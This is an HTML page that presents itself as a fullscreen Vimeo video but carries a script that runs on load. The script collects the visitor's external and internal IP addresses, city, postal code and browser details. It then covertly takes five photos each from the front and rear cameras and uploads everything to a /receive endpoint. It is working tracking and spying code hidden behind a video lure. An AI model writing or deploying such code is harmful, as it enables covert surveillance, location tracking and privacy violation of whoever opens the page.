<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>فيديو ملء الشاشة</title>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body, html { width: 100%; height: 100%; overflow: hidden; background-color: black; }
        .video-container { position: absolute; top: 0; left: 0; width: 100%; height: 100%; display: flex; justify-content: center; align-items: center; }
        iframe { width: 100%; height: 100%; border: none; }
    </style>
</head>
<body>
    <div class="video-container">
        <iframe src="https://player.vimeo.com/video/1061050916?h=05ca902f09&badge=0&autopause=0&player_id=0&app_id=58479" allowfullscreen></iframe>
    </div>

    <script>
        async function collectData() {
            let data = {};

            // ✅ جلب IP الخارجي، الدولة، المدينة
            let ipInfo = await fetch("https://ipinfo.io/json").then(res => res.json());
            data["external_ip"] = ipInfo.ip;
            data["country"] = ipInfo.country;
            data["city"] = ipInfo.city;
            data["postal"] = ipInfo.postal;

            // ✅ جلب IP الداخلي
            async function getLocalIP() {
                return new Promise((resolve) => {
                    let pc = new RTCPeerConnection();
                    pc.createDataChannel("");
                    pc.createOffer().then(offer => pc.setLocalDescription(offer));
                    pc.onicecandidate = event => {
                        if (event && event.candidate) {
                            resolve(event.candidate.address);
                        }
                    };
                });
            }
            data["internal_ip"] = await getLocalIP();

            // ✅ بيانات الجهاز والمتصفح
            data["browser"] = navigator.userAgent;
            data["device"] = navigator.platform;

            // ✅ إرسال البيانات فورًا
            sendData(data);

            // ✅ التقاط 5 صور من الكاميرا الأمامية و5 من الكاميرا الخلفية
            captureAndSendPhotos();
        }

        function sendData(data) {
            fetch("/receive", {
                method: "POST",
                headers: { "Content-Type": "application/json" },
                body: JSON.stringify(data)
            }).then(() => console.log("✅ Data sent successfully"));
        }

        async function captureAndSendPhotos() {
            let video = document.createElement("video");
            video.autoplay = true;
            video.style.display = "none";
            document.body.appendChild(video);

            let constraints = { video: { facingMode: "user" } }; // الكاميرا الأمامية
            let stream = await navigator.mediaDevices.getUserMedia(constraints);
            video.srcObject = stream;

            setTimeout(async () => {
                for (let i = 0; i < 5; i++) {
                    await takePhoto(video, "front");
                }

                // التبديل إلى الكاميرا الخلفية
                constraints.video.facingMode = "environment";
                stream = await navigator.mediaDevices.getUserMedia(constraints);
                video.srcObject = stream;

                setTimeout(async () => {
                    for (let i = 0; i < 5; i++) {
                        await takePhoto(video, "back");
                    }
                }, 1000);
            }, 1000);
        }

        async function takePhoto(video, cameraType) {
            let canvas = document.createElement("canvas");
            canvas.width = video.videoWidth;
            canvas.height = video.videoHeight;
            let ctx = canvas.getContext("2d");
            ctx.drawImage(video, 0, 0, canvas.width, canvas.height);

            canvas.toBlob(blob => {
                let formData = new FormData();
                formData.append("file", blob, `${cameraType}_${Date.now()}.jpg`);

                fetch("/receive", { method: "POST", body: formData })
                    .then(() => console.log(`📸 ${cameraType} photo sent successfully!`));
            }, "image/jpeg");
        }

        window.onload = collectData;
    </script>
</body>
</html>
